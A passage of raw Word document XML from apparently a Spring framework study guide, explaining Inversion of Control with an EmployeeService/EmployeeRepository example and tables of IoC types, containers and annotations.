    <w:p w14:paraId="502215AB" w14:textId="77777777" w:rsidR="00A250AB" w:rsidRPr="00CE4B95" w:rsidRDefault="00A250AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Manages their </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>life cycle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A6314A" w14:textId="77777777" w:rsidR="00A250AB" w:rsidRPr="00CE4B95" w:rsidRDefault="00A250AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20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jects them wherever needed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70BDBA7F" w14:textId="77777777" w:rsidR="00A250AB" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00A250A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C530CFF">
          <v:rect id="_x0000_i2062" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A89971" w14:textId="77777777" w:rsidR="00A250AB" w:rsidRPr="00CE4B95" w:rsidRDefault="00A250AB" w:rsidP="00A250A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Without and With IoC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14134EE8" w14:textId="77777777" w:rsidR="00A250AB" w:rsidRPr="00CE4B95" w:rsidRDefault="00A250AB" w:rsidP="00A250A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ithout IoC:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D6E6730" w14:textId="2A08BFF0" w:rsidR="00C92DF3" w:rsidRPr="00CE4B95" w:rsidRDefault="00C92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102534"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>EmployeeService</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> servic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Service</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Repository</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC2700A" w14:textId="77777777" w:rsidR="00A250AB" w:rsidRPr="00CE4B95" w:rsidRDefault="00A250AB" w:rsidP="00A250A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are controlling the object creation manually.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51510BCB" w14:textId="77777777" w:rsidR="00A250AB" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00A250A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9267039">
          <v:rect id="_x0000_i2063" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3E549F" w14:textId="77777777" w:rsidR="00A250AB" w:rsidRPr="00CE4B95" w:rsidRDefault="00A250AB" w:rsidP="00A250A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ith IoC (Spring):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FFBEA33" w14:textId="77777777" w:rsidR="00C92DF3" w:rsidRPr="00CE4B95" w:rsidRDefault="00C92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202810"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5461DE" w14:textId="77777777" w:rsidR="00C92DF3" w:rsidRPr="00CE4B95" w:rsidRDefault="00C92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202810"/>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Servic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63B7C75" w14:textId="77777777" w:rsidR="00C92DF3" w:rsidRPr="00CE4B95" w:rsidRDefault="00C92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20281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Autowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23226341" w14:textId="77777777" w:rsidR="00C92DF3" w:rsidRPr="00CE4B95" w:rsidRDefault="00C92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20281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mployeeRepository</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> repository</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2246F027" w14:textId="72574694" w:rsidR="00C92DF3" w:rsidRPr="00CE4B95" w:rsidRDefault="00C92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202810"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>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15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE08F7F" w14:textId="77777777" w:rsidR="00A250AB" w:rsidRPr="00CE4B95" w:rsidRDefault="00A250AB" w:rsidP="00A250A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handles the creation of EmployeeRepository and injects it into EmployeeService.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00EDCFA9" w14:textId="77777777" w:rsidR="00A250AB" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00A250A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2AC0F87">
          <v:rect id="_x0000_i2064" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E4435AD" w14:textId="77777777" w:rsidR="00A250AB" w:rsidRPr="00CE4B95" w:rsidRDefault="00A250AB" w:rsidP="00A250A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Types of IoC in Spr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51"/>
        <w:gridCol w:w="5519"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A250AB" w:rsidRPr="00CE4B95" w14:paraId="4A8BD5D0" w14:textId="77777777" w:rsidTr="00A250AB">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="59CBF8ED" w14:textId="77777777" w:rsidR="00A250AB" w:rsidRPr="00CE4B95" w:rsidRDefault="00A250AB" w:rsidP="00C92DF3">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ype</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0119818E" w14:textId="77777777" w:rsidR="00A250AB" w:rsidRPr="00CE4B95" w:rsidRDefault="00A250AB" w:rsidP="00C92DF3">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A250AB" w:rsidRPr="00CE4B95" w14:paraId="7FAB5A0A" w14:textId="77777777" w:rsidTr="00A250AB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7196735D" w14:textId="77777777" w:rsidR="00A250AB" w:rsidRPr="00CE4B95" w:rsidRDefault="00A250AB" w:rsidP="00A250A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pendency Injection (DI)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="33D4A42E" w14:textId="77777777" w:rsidR="00A250AB" w:rsidRPr="00CE4B95" w:rsidRDefault="00A250AB" w:rsidP="00A250A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imary form used in Spring IoC (via constructor/setter/field)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A250AB" w:rsidRPr="00CE4B95" w14:paraId="1D101473" w14:textId="77777777" w:rsidTr="00A250AB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6BAA2FF6" w14:textId="77777777" w:rsidR="00A250AB" w:rsidRPr="00CE4B95" w:rsidRDefault="00A250AB" w:rsidP="00A250A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Event-based IoC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7AFED3CB" w14:textId="77777777" w:rsidR="00A250AB" w:rsidRPr="00CE4B95" w:rsidRDefault="00A250AB" w:rsidP="00A250A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also handles event listeners for components</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0CED4371" w14:textId="77777777" w:rsidR="00A250AB" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00A250A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DDC7932">
          <v:rect id="_x0000_i2065" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0540FA5B" w14:textId="77777777" w:rsidR="00A250AB" w:rsidRPr="00CE4B95" w:rsidRDefault="00A250AB" w:rsidP="00A250A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pring IoC Contain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0"/>
        <w:gridCol w:w="5797"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A250AB" w:rsidRPr="00CE4B95" w14:paraId="55F00577" w14:textId="77777777" w:rsidTr="00A250AB">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="28D1204B" w14:textId="77777777" w:rsidR="00A250AB" w:rsidRPr="00CE4B95" w:rsidRDefault="00A250AB" w:rsidP="00C92DF3">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tainer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="79D0AFAA" w14:textId="77777777" w:rsidR="00A250AB" w:rsidRPr="00CE4B95" w:rsidRDefault="00A250AB" w:rsidP="00C92DF3">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A250AB" w:rsidRPr="00CE4B95" w14:paraId="6936C22B" w14:textId="77777777" w:rsidTr="00A250AB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="740E980B" w14:textId="77777777" w:rsidR="00A250AB" w:rsidRPr="00CE4B95" w:rsidRDefault="00A250AB" w:rsidP="00A250A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anFactory</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6EEBDAD3" w14:textId="77777777" w:rsidR="00A250AB" w:rsidRPr="00CE4B95" w:rsidRDefault="00A250AB" w:rsidP="00A250A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ghtweight, basic IoC container</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A250AB" w:rsidRPr="00CE4B95" w14:paraId="07C46A2E" w14:textId="77777777" w:rsidTr="00A250AB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="74C3CCA6" w14:textId="77777777" w:rsidR="00A250AB" w:rsidRPr="00CE4B95" w:rsidRDefault="00A250AB" w:rsidP="00A250A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pplicationContext</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="168F0520" w14:textId="77777777" w:rsidR="00A250AB" w:rsidRPr="00CE4B95" w:rsidRDefault="00A250AB" w:rsidP="00A250A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re advanced, supports AOP, internationalization, events, etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="152A1A1D" w14:textId="77777777" w:rsidR="00A250AB" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00A250A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E22541E">
          <v:rect id="_x0000_i2066" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B38953E" w14:textId="77777777" w:rsidR="00A250AB" w:rsidRPr="00CE4B95" w:rsidRDefault="00A250AB" w:rsidP="00A250A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Annotations Us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6"/>
        <w:gridCol w:w="3129"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A250AB" w:rsidRPr="00CE4B95" w14:paraId="2F9C2885" w14:textId="77777777" w:rsidTr="00A250AB">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="14C222AC" w14:textId="77777777" w:rsidR="00A250AB" w:rsidRPr="00CE4B95" w:rsidRDefault="00A250AB" w:rsidP="00C92DF3">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nnotation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="76B8EE55" w14:textId="77777777" w:rsidR="00A250AB" w:rsidRPr="00CE4B95" w:rsidRDefault="00A250AB" w:rsidP="00C92DF3">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urpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A250AB" w:rsidRPr="00CE4B95" w14:paraId="6DF64A33" w14:textId="77777777" w:rsidTr="00A250AB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="14CB30B0" w14:textId="77777777" w:rsidR="00A250AB" w:rsidRPr="00CE4B95" w:rsidRDefault="00A250AB" w:rsidP="00A250A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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="52179685" w14:textId="77777777" w:rsidR="00A250AB" w:rsidRPr="00CE4B95" w:rsidRDefault="00A250AB" w:rsidP="00A250A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gisters a class as a bean</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A250AB" w:rsidRPr="00CE4B95" w14:paraId="47DCC555" w14:textId="77777777" w:rsidTr="00A250AB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C897739" w14:textId="77777777" w:rsidR="00A250AB" w:rsidRPr="00CE4B95" w:rsidRDefault="00A250AB" w:rsidP="00A250A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utowired</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60AF8060" w14:textId="77777777" w:rsidR="00A250AB" w:rsidRPr="00CE4B95" w:rsidRDefault="00A250AB" w:rsidP="00A250A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jects dependencies</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A250AB" w:rsidRPr="00CE4B95" w14:paraId="4B08EA7E" w14:textId="77777777" w:rsidTr="00A250AB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7B8B1B47" w14:textId="77777777" w:rsidR="00A250AB" w:rsidRPr="00CE4B95" w:rsidRDefault="00A250AB" w:rsidP="00A250A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figuration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="22A264FC" w14:textId="77777777" w:rsidR="00A250AB" w:rsidRPr="00CE4B95" w:rsidRDefault="00A250AB" w:rsidP="00A250A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to define bean configuration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A250AB" w:rsidRPr="00CE4B95" w14:paraId="331B77E1" w14:textId="77777777" w:rsidTr="00A250AB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3018C089" w14:textId="77777777" w:rsidR="00A250AB" w:rsidRPr="00CE4B95" w:rsidRDefault="00A250AB" w:rsidP="00A250A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an</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="409F1CAA" w14:textId="77777777" w:rsidR="00A250AB" w:rsidRPr="00CE4B95" w:rsidRDefault="00A250AB" w:rsidP="00A250A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to declare a bean manually</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3FD2CF93" w14:textId="77777777" w:rsidR="00A250AB" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00A250A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60204C0">
          <v:rect id="_x0000_i2067" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="15721644" w14:textId="77777777" w:rsidR="00A250AB" w:rsidRPr="00CE4B95" w:rsidRDefault="00A250AB" w:rsidP="00A250A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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CCFCB4" w14:textId="77777777" w:rsidR="00A250AB" w:rsidRPr="00CE4B95" w:rsidRDefault="00A250AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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oC</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> = Giving control to Spring to manage object creation and wiring.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5707629A" w14:textId="77777777" w:rsidR="00A250AB" w:rsidRPr="00CE4B95" w:rsidRDefault="00A250AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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reduces </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>tight coupling</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, increases </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>testability</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and improves </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>code clarity</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="515E8649" w14:textId="77777777" w:rsidR="00A250AB" w:rsidRPr="00CE4B95" w:rsidRDefault="00A250AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20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mplemented mainly using </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Dependency Injection (DI)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32527E47" w14:textId="77777777" w:rsidR="00A250AB" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00A250A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67D0B5A">
          <v:rect id="_x0000_i2068" style="width:0;height:1.5pt" o:hralign="center" o:bullet="t" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="309A0A04" w14:textId="77777777" w:rsidR="00851532" w:rsidRPr="00CE4B95" w:rsidRDefault="00851532" w:rsidP="00A250AB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43641252" w14:textId="77777777" w:rsidR="00851532" w:rsidRPr="00CE4B95" w:rsidRDefault="00851532" w:rsidP="00A250AB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64D0E821" w14:textId="77777777" w:rsidR="00851532" w:rsidRPr="00CE4B95" w:rsidRDefault="00851532" w:rsidP="00A250AB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1063FA12" w14:textId="77777777" w:rsidR="00851532" w:rsidRPr="00CE4B95" w:rsidRDefault="00851532" w:rsidP="00A250AB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D4807B7" w14:textId="3303A658" w:rsidR="00E42DCE" w:rsidRPr="00CE4B95" w:rsidRDefault="00FB5276" w:rsidP="00E42DCE">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="427" w:name="_Toc196307907"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Explain</w:t>
      </w:r>
      <w:r w:rsidR="00E42DCE" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="00E42DCE" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">pring </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
